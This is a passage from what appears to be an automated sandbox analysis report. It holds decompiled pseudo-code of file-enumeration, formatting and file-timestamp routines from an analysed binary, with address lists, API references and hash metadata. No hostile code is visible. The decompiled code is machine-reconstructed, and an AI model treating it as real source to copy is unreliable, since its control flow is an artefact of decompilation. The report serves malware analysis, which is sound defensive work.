									goto L23;
								case 0xc:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x84);
									goto L13;
								case 0xd:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x83);
									goto L13;
								case 0xe:
									goto L61;
								case 0xf:
									_push( *((intOrPtr*)(__esi + 8)));
									_push( *((intOrPtr*)(__esi + 4)));
									__eax = E00C3DA42(__ecx, 0xd2);
									return __eax;
								case 0x10:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x79);
									goto L13;
								case 0x11:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xdc);
									L13:
									_push(E00C3DA42(_t41));
									_push( *_t44);
									goto L8;
							}
						}
					}
				}
				L61:
				return _t26;
			}













                                            0x00c40a9f
                                            0x00c40aa9
                                            0x00c40aab
                                            0x00c40aae
                                            0x00c40ab1
                                            0x00c40cd8
                                            0x00c40cdb
                                            0x00c40cdd
                                            0x00c40ce9
                                            0x00000000
                                            0x00c40d00
                                            0x00c40ab7
                                            0x00c40ab7
                                            0x00c40cce
                                            0x00c40bfb
                                            0x00c40c00
                                            0x00c40c01
                                            0x00c40b3e
                                            0x00c40b3e
                                            0x00c40b07
                                            0x00000000
                                            0x00c40b07
                                            0x00c40abd
                                            0x00c40ac0
                                            0x00c40bc0
                                            0x00c40bc3
                                            0x00c40c83
                                            0x00c40c83
                                            0x00c40c86
                                            0x00c40cc4
                                            0x00000000
                                            0x00c40cc4
                                            0x00c40c88
                                            0x00c40c88
                                            0x00c40c8b
                                            0x00c40cbd
                                            0x00000000
                                            0x00c40cbd
                                            0x00c40c8d
                                            0x00c40c8d
                                            0x00c40c90
                                            0x00c40cb0
                                            0x00c40cb3
                                            0x00000000
                                            0x00c40cb3
                                            0x00c40c92
                                            0x00c40c92
                                            0x00c40c95
                                            0x00c40ca6
                                            0x00000000
                                            0x00c40ca6
                                            0x00c40c97
                                            0x00c40c97
                                            0x00c40c9a
                                            0x00c40c9c
                                            0x00000000
                                            0x00c40c9c
                                            0x00c40bc9
                                            0x00c40bc9
                                            0x00c40c7c
                                            0x00000000
                                            0x00c40c7c
                                            0x00c40bcf
                                            0x00c40bd2
                                            0x00c40bd5
                                            0x00c40bdb
                                            0x00000000
                                            0x00c40be2
                                            0x00000000
                                            0x00000000
                                            0x00c40bec
                                            0x00000000
                                            0x00000000
                                            0x00c40bf6
                                            0x00000000
                                            0x00000000
                                            0x00c40c08
                                            0x00000000
                                            0x00000000
                                            0x00c40c0c
                                            0x00000000
                                            0x00000000
                                            0x00c40c10
                                            0x00c40c13
                                            0x00000000
                                            0x00000000
                                            0x00c40c1a
                                            0x00000000
                                            0x00000000
                                            0x00c40c21
                                            0x00000000
                                            0x00000000
                                            0x00c40c28
                                            0x00c40c2b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c40c35
                                            0x00c40c38
                                            0x00000000
                                            0x00000000
                                            0x00c40c4d
                                            0x00c40c59
                                            0x00c40c5e
                                            0x00c40c61
                                            0x00c40c67
                                            0x00000000
                                            0x00000000
                                            0x00c40bdb
                                            0x00c40bd5
                                            0x00c40ac6
                                            0x00c40ac6
                                            0x00c40bb7
                                            0x00c40bb9
                                            0x00c40b5b
                                            0x00c40b5b
                                            0x00c40ae3
                                            0x00c40ae3
                                            0x00c40ae5
                                            0x00000000
                                            0x00c40aea
                                            0x00c40acf
                                            0x00c40ad5
                                            0x00000000
                                            0x00c40af2
                                            0x00c40af4
                                            0x00c40af9
                                            0x00000000
                                            0x00000000
                                            0x00c40adc
                                            0x00c40ade
                                            0x00000000
                                            0x00000000
                                            0x00c40b00
                                            0x00c40b02
                                            0x00000000
                                            0x00000000
                                            0x00c40b0d
                                            0x00c40b10
                                            0x00000000
                                            0x00000000
                                            0x00c40b1c
                                            0x00c40b1f
                                            0x00000000
                                            0x00000000
                                            0x00c40b23
                                            0x00c40b26
                                            0x00000000
                                            0x00000000
                                            0x00c40b2a
                                            0x00c40b2d
                                            0x00000000
                                            0x00000000
                                            0x00c40b34
                                            0x00c40b36
                                            0x00c40b3b
                                            0x00c40b3c
                                            0x00000000
                                            0x00000000
                                            0x00c40b46
                                            0x00c40b49
                                            0x00000000
                                            0x00000000
                                            0x00c40b4d
                                            0x00c40b50
                                            0x00000000
                                            0x00000000
                                            0x00c40b54
                                            0x00c40b56
                                            0x00000000
                                            0x00000000
                                            0x00c40b63
                                            0x00c40b65
                                            0x00000000
                                            0x00000000
                                            0x00c40b6c
                                            0x00c40b6f
                                            0x00000000
                                            0x00000000
                                            0x00c40b76
                                            0x00c40b79
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c40b80
                                            0x00c40b83
                                            0x00c40b8b
                                            0x00000000
                                            0x00000000
                                            0x00c40ba0
                                            0x00c40ba3
                                            0x00000000
                                            0x00000000
                                            0x00c40baa
                                            0x00c40bad
                                            0x00c40b12
                                            0x00c40b17
                                            0x00c40b18
                                            0x00000000
                                            0x00000000
                                            0x00c40ad5
                                            0x00c40acf
                                            0x00c40ac0
                                            0x00c40d09
                                            0x00c40d09

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _swprintf
                                            • String ID: %ls$%s: %s
                                            • API String ID: 589789837-2259941744
                                            • Opcode ID: cc23cc1ff4cb1ef78585293907f7277377cf28eb928ecdf37f2da2b8390c0d0d
                                            • Instruction ID: 316bb1e0fa7beee8ace07cdbef92f341000081977509a4987f43b92ea1631d7d
                                            • Opcode Fuzzy Hash: cc23cc1ff4cb1ef78585293907f7277377cf28eb928ecdf37f2da2b8390c0d0d
                                            • Instruction Fuzzy Hash: DF512A356CC301FBE6212B958E82F367669FB05B04F308506F79B684E3D5B25920B70B
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C59E43, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 75%
                                            			E00C59E43(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t136;
				void* _t138;
				signed int _t139;
				signed int _t142;
				signed int _t144;
				signed int _t146;
				signed int* _t147;
				signed int _t150;
				void* _t153;
				CHAR* _t154;
				char _t157;
				char _t159;
				intOrPtr* _t162;
				void* _t163;
				intOrPtr* _t164;
				signed int _t166;
				void* _t168;
				intOrPtr* _t169;
				signed int _t173;
				signed int _t177;
				signed int _t178;
				intOrPtr* _t183;
				void* _t192;
				intOrPtr _t193;
				signed int _t195;
				signed int _t196;
				signed int _t198;
				signed int _t199;
				signed int _t201;
				union _FINDEX_INFO_LEVELS _t202;
				signed int _t207;
				signed int _t209;
				signed int _t210;
				void* _t212;
				intOrPtr _t213;
				void* _t214;
				signed int _t218;
				void* _t220;
				signed int _t221;
				void* _t222;
				void* _t223;
				void* _t224;
				signed int _t225;
				void* _t226;
				void* _t227;

				_t80 = _a8;
				_t223 = _t222 - 0x20;
				if(_t80 != 0) {
					_t207 = _a4;
					_t159 = 0;
					 *_t80 = 0;
					_t198 = 0;
					_t150 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t207;
					if( *_t207 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t150 - _t198;
						_v8 = _t159;
						_t190 = (_t82 >> 2) + 1;
						__eflags = _t150 - _t198;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t209 =  !_t207 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t209;
						if(_t209 != 0) {
							_t196 = _t198;
							_t157 = _t159;
							do {
								_t183 =  *_t196;
								_t17 = _t183 + 1; // 0x1
								_v8 = _t17;
								do {
									_t142 =  *_t183;
									_t183 = _t183 + 1;
									__eflags = _t142;
								} while (_t142 != 0);
								_t157 = _t157 + 1 + _t183 - _v8;
								_t196 = _t196 + 4;
								_t144 = _v12 + 1;
								_v12 = _t144;
								__eflags = _t144 - _t209;
							} while (_t144 != _t209);
							_t190 = _v16;
							_v8 = _t157;
							_t150 = _v336.cAlternateFileName;
						}
						_t210 = E00C56F0C(_t190, _v8, 1);
						_t224 = _t223 + 0xc;
						__eflags = _t210;
						if(_t210 != 0) {
							_t87 = _t210 + _v16 * 4;
							_v20 = _t87;
							_t191 = _t87;
							_v16 = _t87;
							__eflags = _t198 - _t150;
							if(_t198 == _t150) {
								L23:
								_t199 = 0;
								__eflags = 0;
								 *_a8 = _t210;
								goto L24;
							} else {
								_t93 = _t210 - _t198;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t162 =  *_t198;
									_v12 = _t162 + 1;
									do {
										_t95 =  *_t162;
										_t162 = _t162 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t163 = _t162 - _v12;
									_t35 = _t163 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E00C5DD71(_t163, _t191, _v20 - _t191 + _v8,  *_t198);
									_t224 = _t224 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E00C57DBB();
										asm("int3");
										_t220 = _t224;
										_push(_t163);
										_t164 = _v64;
										_t47 = _t164 + 1; // 0x1
										_t192 = _t47;
										do {
											_t103 =  *_t164;
											_t164 = _t164 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t198);
										_t201 = _a8;
										_t166 = _t164 - _t192 + 1;
										_v12 = _t166;
										__eflags = _t166 - (_t103 | 0xffffffff) - _t201;
										if(_t166 <= (_t103 | 0xffffffff) - _t201) {
											_push(_t150);
											_t50 = _t201 + 1; // 0x1
											_t153 = _t50 + _t166;
											_t212 = E00C57B1B(_t166, _t153, 1);
											_t168 = _t210;
											__eflags = _t201;
											if(_t201 == 0) {
												L34:
												_push(_v12);
												_t153 = _t153 - _t201;
												_t108 = E00C5DD71(_t168, _t212 + _t201, _t153, _v0);
												_t225 = _t224 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t136 = E00C5A212(_a12, _t192, __eflags, _t212);
													E00C57A50(0);
													_t138 = _t136;
													goto L36;
												}
											} else {
												_push(_t201);
												_t139 = E00C5DD71(_t168, _t212, _t153, _a4);
												_t225 = _t224 + 0x10;
												__eflags = _t139;
												if(_t139 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00C57DBB();
													asm("int3");
													_push(_t220);
													_t221 = _t225;
													_t226 = _t225 - 0x150;
													_t111 =  *0xc6d668; // 0x13bcba52
													_v116 = _t111 ^ _t221;
													_t169 = _v100;
													_push(_t153);
													_t154 = _v104;
													_push(_t212);
													_t213 = _v96;
													_push(_t201);
													_v440 = _t213;
													while(1) {
														__eflags = _t169 - _t154;
														if(_t169 == _t154) {
															break;
														}
														_t113 =  *_t169;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t169 = E00C5DDC0(_t154, _t169);
																	continue;
																}
															}
														}
														break;
													}
													_t193 =  *_t169;
													__eflags = _t193 - 0x3a;
													if(_t193 != 0x3a) {
														L47:
														_t202 = 0;
														__eflags = _t193 - 0x2f;
														if(_t193 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t193 - 0x5c;
															if(_t193 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t193 - 0x3a;
																if(_t193 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t169 - _t154 + 0x00000001;
														E00C4E920(_t202,  &_v336, _t202, 0x140);
														_t227 = _t226 + 0xc;
														_t214 = FindFirstFileExA(_t154, _t202,  &_v336, _t202, _t202, _t202);
														_t123 = _v340;
														__eflags = _t214 - 0xffffffff;
														if(_t214 != 0xffffffff) {
															_t173 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t173;
															_v348 = _t173 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t154);
																	_push(_t123);
																	L28();
																	_t227 = _t227 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t177 = _v291;
																	__eflags = _t177;
																	if(_t177 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t177 - 0x2e;
																		if(_t177 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t214,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t194 =  *_t123;
															_t178 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t178 - _t131;
															if(_t178 != _t131) {
																E00C55030(_t154, _t202, _t214, _t194 + _t178 * 4, _t131 - _t178, 4, E00C59E2B);
															}
														} else {
															_push(_t123);
															_push(_t202);
															_push(_t202);
															_push(_t154);
															L28();
															L54:
															_t202 = _t123;
														}
														__eflags = _t214 - 0xffffffff;
														if(_t214 != 0xffffffff) {
															FindClose(_t214);
														}
														_t124 = _t202;
													} else {
														_t124 =  &(_t154[1]);
														__eflags = _t169 -  &(_t154[1]);
														if(_t169 ==  &(_t154[1])) {
															goto L47;
														} else {
															_push(_t213);
															_push(0);
															_push(0);
															_push(_t154);
															L28();
														}
													}
													L58:
													__eflags = _v16 ^ _t221;
													return E00C4E203(_t124, _v16 ^ _t221);
												} else {
													goto L34;
												}
											}
										} else {
											_t138 = 0xc;
											L36:
											return _t138;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t195 = _v16;
									 *((intOrPtr*)(_v24 + _t198)) = _t195;
									_t198 = _t198 + 4;
									_t191 = _t195 + _v12;
									_v16 = _t195 + _v12;
									__eflags = _t198 - _t150;
								} while (_t198 != _t150);
								goto L23;
							}
						} else {
							_t199 = _t198 | 0xffffffff;
							L24:
							E00C57A50(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t159;
							_t146 = E00C5DD80( *_t207,  &_v8);
							__eflags = _t146;
							if(_t146 != 0) {
								_push( &_v36);
								_push(_t146);
								_push( *_t207);
								L38();
								_t223 = _t223 + 0xc;
							} else {
								_t146 =  &_v36;
								_push(_t146);
								_push(0);
								_push(0);
								_push( *_t207);
								L28();
								_t223 = _t223 + 0x10;
							}
							_t199 = _t146;
							__eflags = _t199;
							if(_t199 != 0) {
								break;
							}
							_t207 = _t207 + 4;
							_t159 = 0;
							__eflags =  *_t207;
							if( *_t207 != 0) {
								continue;
							} else {
								_t150 = _v336.cAlternateFileName;
								_t198 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E00C5A1ED( &_v36);
						_t91 = _t199;
						goto L26;
					}
				} else {
					_t147 = E00C57ECC();
					_t218 = 0x16;
					 *_t147 = _t218;
					E00C57DAB();
					_t91 = _t218;
					L26:
					return _t91;
				}
				L68:
			}





















































































                                            0x00c59e48
                                            0x00c59e4b
                                            0x00c59e51
                                            0x00c59e69
                                            0x00c59e6c
                                            0x00c59e70
                                            0x00c59e72
                                            0x00c59e74
                                            0x00c59e76
                                            0x00c59e79
                                            0x00c59e7c
                                            0x00c59e7f
                                            0x00c59e81
                                            0x00c59ed9
                                            0x00c59ed9
                                            0x00c59edf
                                            0x00c59ee1
                                            0x00c59eec
                                            0x00c59ef0
                                            0x00c59ef2
                                            0x00c59ef5
                                            0x00c59ef9
                                            0x00c59ef9
                                            0x00c59efb
                                            0x00c59efd
                                            0x00c59eff
                                            0x00c59f01
                                            0x00c59f01
                                            0x00c59f03
                                            0x00c59f06
                                            0x00c59f09
                                            0x00c59f09
                                            0x00c59f0b
                                            0x00c59f0c
                                            0x00c59f0c
                                            0x00c59f17
                                            0x00c59f19
                                            0x00c59f1c
                                            0x00c59f1d
                                            0x00c59f20
                                            0x00c59f20
                                            0x00c59f24
                                            0x00c59f27
                                            0x00c59f2a
                                            0x00c59f2a
                                            0x00c59f38
                                            0x00c59f3a
                                            0x00c59f3d
                                            0x00c59f3f
                                            0x00c59f49
                                            0x00c59f4c
                                            0x00c59f4f
                                            0x00c59f51
                                            0x00c59f54
                                            0x00c59f56
                                            0x00c59fa6
                                            0x00c59fa9
                                            0x00c59fa9
                                            0x00c59fab
                                            0x00000000
                                            0x00c59f58
                                            0x00c59f5a
                                            0x00c59f5a
                                            0x00c59f5c
                                            0x00c59f5f
                                            0x00c59f5f
                                            0x00c59f64
                                            0x00c59f67
                                            0x00c59f67
                                            0x00c59f69
                                            0x00c59f6a
                                            0x00c59f6a
                                            0x00c59f6e
                                            0x00c59f71
                                            0x00c59f71
                                            0x00c59f74
                                            0x00c59f77
                                            0x00c59f84
                                            0x00c59f89
                                            0x00c59f8c
                                            0x00c59f8e
                                            0x00c59fc8
                                            0x00c59fc9
                                            0x00c59fca
                                            0x00c59fcb
                                            0x00c59fcc
                                            0x00c59fcd
                                            0x00c59fd2
                                            0x00c59fd6
                                            0x00c59fd8
                                            0x00c59fd9
                                            0x00c59fdc
                                            0x00c59fdc
                                            0x00c59fdf
                                            0x00c59fdf
                                            0x00c59fe1
                                            0x00c59fe2
                                            0x00c59fe2
                                            0x00c59feb
                                            0x00c59fec
                                            0x00c59fef
                                            0x00c59ff2
                                            0x00c59ff5
                                            0x00c59ff7
                                            0x00c59ffe
                                            0x00c5a000
                                            0x00c5a003
                                            0x00c5a00d
                                            0x00c5a010
                                            0x00c5a011
                                            0x00c5a013
                                            0x00c5a027
                                            0x00c5a027
                                            0x00c5a02a
                                            0x00c5a034
                                            0x00c5a039
                                            0x00c5a03c
                                            0x00c5a03e
                                            0x00000000
                                            0x00c5a040
                                            0x00c5a044
                                            0x00c5a04d
                                            0x00c5a053
                                            0x00000000
                                            0x00c5a056
                                            0x00c5a015
                                            0x00c5a015
                                            0x00c5a01b
                                            0x00c5a020
                                            0x00c5a023
                                            0x00c5a025
                                            0x00c5a05c
                                            0x00c5a05e
                                            0x00c5a05f
                                            0x00c5a060
                                            0x00c5a061
                                            0x00c5a062
                                            0x00c5a063
                                            0x00c5a068
                                            0x00c5a06b
                                            0x00c5a06c
                                            0x00c5a06e
                                            0x00c5a074
                                            0x00c5a07b
                                            0x00c5a07e
                                            0x00c5a081
                                            0x00c5a082
                                            0x00c5a085
                                            0x00c5a086
                                            0x00c5a089
                                            0x00c5a08a
                                            0x00c5a0ab
                                            0x00c5a0ab
                                            0x00c5a0ad
                                            0x00000000
                                            0x00000000
                                            0x00c5a092
                                            0x00c5a094
                                            0x00c5a096
                                            0x00c5a098
                                            0x00c5a09a
                                            0x00c5a09c
                                            0x00c5a09e
                                            0x00c5a0a9
                                            0x00000000
                                            0x00c5a0a9
                                            0x00c5a09e
                                            0x00c5a09a
                                            0x00000000
                                            0x00c5a096
                                            0x00c5a0af
                                            0x00c5a0b1
                                            0x00c5a0b4
                                            0x00c5a0cd
                                            0x00c5a0cd
                                            0x00c5a0cf
                                            0x00c5a0d2
                                            0x00c5a0e2
                                            0x00c5a0e4
                                            0x00c5a0e4
                                            0x00c5a0d4
                                            0x00c5a0d4
                                            0x00c5a0d7
                                            0x00000000
                                            0x00c5a0d9
                                            0x00c5a0d9
                                            0x00c5a0dc
                                            0x00000000
                                            0x00c5a0de
                                            0x00c5a0de
                                            0x00c5a0de
                                            0x00c5a0dc
                                            0x00c5a0d7
                                            0x00c5a0f2
                                            0x00c5a0f6
                                            0x00c5a104
                                            0x00c5a109
                                            0x00c5a11e
                                            0x00c5a120
                                            0x00c5a126
                                            0x00c5a129
                                            0x00c5a15b
                                            0x00c5a15b
                                            0x00c5a160
                                            0x00c5a166
                                            0x00c5a166
                                            0x00c5a16d
                                            0x00c5a187
                                            0x00c5a187
                                            0x00c5a188
                                            0x00c5a18e
                                            0x00c5a194
                                            0x00c5a195
                                            0x00c5a196
                                            0x00c5a19b
                                            0x00c5a19e
                                            0x00c5a1a0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c5a16f
                                            0x00c5a16f
                                            0x00c5a175
                                            0x00c5a177
                                            0x00000000
                                            0x00c5a179
                                            0x00c5a179
                                            0x00c5a17c
                                            0x00000000
                                            0x00c5a17e
                                            0x00c5a17e
                                            0x00c5a185
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c5a185
                                            0x00c5a17c
                                            0x00c5a177
                                            0x00000000
                                            0x00c5a1a2
                                            0x00c5a1aa
                                            0x00c5a1b0
                                            0x00c5a1b2
                                            0x00c5a1b2
                                            0x00c5a1ba
                                            0x00c5a1bf
                                            0x00c5a1c7
                                            0x00c5a1ca
                                            0x00c5a1cc
                                            0x00c5a1e0
                                            0x00c5a1e5
                                            0x00c5a12b
                                            0x00c5a12b
                                            0x00c5a12c
                                            0x00c5a12d
                                            0x00c5a12e
                                            0x00c5a12f
                                            0x00c5a137
                                            0x00c5a137
                                            0x00c5a137
                                            0x00c5a139
                                            0x00c5a13c
                                            0x00c5a13f
                                            0x00c5a13f
                                            0x00c5a145
                                            0x00c5a0b6
                                            0x00c5a0b6
                                            0x00c5a0b9
                                            0x00c5a0bb
                                            0x00000000
                                            0x00c5a0bd
                                            0x00c5a0bd
                                            0x00c5a0c0
                                            0x00c5a0c1
                                            0x00c5a0c2
                                            0x00c5a0c3
                                            0x00c5a0c8
                                            0x00c5a0bb
                                            0x00c5a147
                                            0x00c5a14c
                                            0x00c5a157
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c5a025
                                            0x00c59ff9
                                            0x00c59ffb
                                            0x00c5a057
                                            0x00c5a05b
                                            0x00c5a05b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c59f90
                                            0x00c59f93
                                            0x00c59f96
                                            0x00c59f99
                                            0x00c59f9c
                                            0x00c59f9f
                                            0x00c59fa2
                                            0x00c59fa2
                                            0x00000000
                                            0x00c59f5f
                                            0x00c59f41
                                            0x00c59f41
                                            0x00c59fad
                                            0x00c59faf
                                            0x00000000
                                            0x00c59fb4
                                            0x00c59e83
                                            0x00c59e83
                                            0x00c59e86
                                            0x00c59e8f
                                            0x00c59e92
                                            0x00c59e99
                                            0x00c59e9b
                                            0x00c59eb4
                                            0x00c59eb5
                                            0x00c59eb6
                                            0x00c59eb8
                                            0x00c59ebd
                                            0x00c59e9d
                                            0x00c59e9d
                                            0x00c59ea0
                                            0x00c59ea1
                                            0x00c59ea3
                                            0x00c59ea5
                                            0x00c59ea7
                                            0x00c59eac
                                            0x00c59eac
                                            0x00c59ec0
                                            0x00c59ec2
                                            0x00c59ec4
                                            0x00000000
                                            0x00000000
                                            0x00c59eca
                                            0x00c59ecd
                                            0x00c59ecf
                                            0x00c59ed1
                                            0x00000000
                                            0x00c59ed3
                                            0x00c59ed3
                                            0x00c59ed6
                                            0x00000000
                                            0x00c59ed6
                                            0x00000000
                                            0x00c59ed1
                                            0x00c59fb5
                                            0x00c59fb8
                                            0x00c59fbd
                                            0x00000000
                                            0x00c59fc0
                                            0x00c59e53
                                            0x00c59e53
                                            0x00c59e5a
                                            0x00c59e5b
                                            0x00c59e5d
                                            0x00c59e62
                                            0x00c59fc1
                                            0x00c59fc5
                                            0x00c59fc5
                                            0x00000000

                                            APIs
                                            • _free.LIBCMT ref: 00C59FAF
                                              • Part of subcall function 00C57DBB: IsProcessorFeaturePresent.KERNEL32(00000017,00C57DAA,00000016,00C57AE8,0000002C,00C6A968,00C5AF68,?,?,?,00C57DB7,00000000,00000000,00000000,00000000,00000000), ref: 00C57DBD
                                              • Part of subcall function 00C57DBB: GetCurrentProcess.KERNEL32(C0000417,00C57AE8,00000016,00C58599), ref: 00C57DDF
                                              • Part of subcall function 00C57DBB: TerminateProcess.KERNEL32(00000000), ref: 00C57DE6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                            • String ID: *?$.
                                            • API String ID: 2667617558-3972193922
                                            • Opcode ID: 94f8a64fa80366221982f68d4a3b181e271fc585eb11c879034c7e578db89a15
                                            • Instruction ID: 710ea40d94c3c8db0ce37f519ae0d09d26a279b46e81669d0e9b40de664cbdbf
                                            • Opcode Fuzzy Hash: 94f8a64fa80366221982f68d4a3b181e271fc585eb11c879034c7e578db89a15
                                            • Instruction Fuzzy Hash: 7F51E479E00209EFCF10CFA8C881AADBBF5EF48311F2442A9EC55E7301E6719E858B54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C37570, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 80%
                                            			E00C37570(void* __ecx, void* __edx) {
				void* __esi;
				char _t54;
				signed int _t57;
				void* _t61;
				signed int _t62;
				signed int _t68;
				signed int _t85;
				void* _t90;
				void* _t99;
				void* _t101;
				intOrPtr* _t106;
				void* _t108;

				_t99 = __edx;
				E00C4D870(E00C61298, _t108);
				E00C4D940();
				_t106 =  *((intOrPtr*)(_t108 + 0xc));
				if( *_t106 == 0) {
					L3:
					_t101 = 0x802;
					E00C3FAB1(_t108 - 0x1010, _t106, 0x802);
					L4:
					_t81 =  *((intOrPtr*)(_t108 + 8));
					E00C37773(_t106,  *((intOrPtr*)(_t108 + 8)), _t108 - 0x407c, 0x800);
					_t113 =  *((short*)(_t108 - 0x407c)) - 0x3a;
					if( *((short*)(_t108 - 0x407c)) == 0x3a) {
						__eflags =  *((char*)(_t108 + 0x10));
						if(__eflags == 0) {
							E00C3FA89(__eflags, _t108 - 0x1010, _t108 - 0x407c, _t101);
							E00C36EF9(_t108 - 0x307c);
							_push(0);
							_t54 = E00C3A1B1(_t108 - 0x307c, _t99, __eflags, _t106, _t108 - 0x307c);
							_t85 =  *(_t108 - 0x2074);
							 *((char*)(_t108 + 0x13)) = _t54;
							__eflags = _t85 & 0x00000001;
							if((_t85 & 0x00000001) != 0) {
								__eflags = _t85 & 0xfffffffe;
								E00C3A12F(_t106, _t85 & 0xfffffffe);
							}
							E00C3943C(_t108 - 0x2034);
							 *((intOrPtr*)(_t108 - 4)) = 1;
							_t57 = E00C39BE6(_t108 - 0x2034, __eflags, _t108 - 0x1010, 0x11);
							__eflags = _t57;
							if(_t57 != 0) {
								_push(0);
								_push(_t108 - 0x2034);
								_push(0);
								_t68 = E00C3399D(_t81, _t99);
								__eflags = _t68;
								if(_t68 != 0) {
									E00C394DA(_t108 - 0x2034);
								}
							}
							E00C3943C(_t108 - 0x50a0);
							__eflags =  *((char*)(_t108 + 0x13));
							 *((char*)(_t108 - 4)) = 2;
							if( *((char*)(_t108 + 0x13)) != 0) {
								_t62 = E00C39768(_t108 - 0x50a0, _t106, _t106, 5);
								__eflags = _t62;
								if(_t62 != 0) {
									SetFileTime( *(_t108 - 0x509c), _t108 - 0x2054, _t108 - 0x204c, _t108 - 0x2044);
								}
							}
							E00C3A12F(_t106,  *(_t108 - 0x2074));
							E00C3946E(_t108 - 0x50a0);
							_t90 = _t108 - 0x2034;
						} else {
							E00C3943C(_t108 - 0x60c4);
							_push(1);
							_push(_t108 - 0x60c4);
							_push(0);
							 *((intOrPtr*)(_t108 - 4)) = 0;
